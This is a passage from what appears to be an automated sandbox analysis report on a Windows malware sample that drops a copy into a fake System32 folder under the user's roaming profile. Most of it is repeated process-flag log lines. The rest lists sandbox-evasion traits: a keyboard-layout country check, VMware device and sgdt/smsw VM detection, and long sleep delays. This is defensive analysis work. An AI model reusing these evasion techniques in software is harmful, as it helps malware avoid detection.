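The second reason is the one worth alerting on: a System32 directory under a roaming profile has no legitimate origin, whereas the first reason alone also fires on OneDrive-style per-user installers and should be suppressed by signer or hash, not by path. Expanding %windir% with a fixed table rather than the analyst's own environment is what keeps the SecurityHealth entry from being a false positive.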
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Country aware sample found (crashes after keyboard check)
          Source: c:\users\user\desktop\extractoserfinanza989543704031499704092798964.exe Event Logs and Signature results: Application crash and keyboard check
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 24_2_01033080 sgdt fword ptr [eax] 24_2_01033080
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 24_2_01033080 smsw word ptr [edx+edx*4-74AAFF22h] 24_2_01033080
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 7_2_004113C9
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 25_2_004113C9
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Window / User API: threadDelayed 599
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 6988 Thread sleep count: 50 > 30
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 6848 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 4620 Thread sleep count: 599 > 30
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 4620 Thread sleep time: -5990000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh 7_2_00405156
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh 7_2_00405156
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 25_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh 25_2_00405156
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 25_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh 25_2_00405156
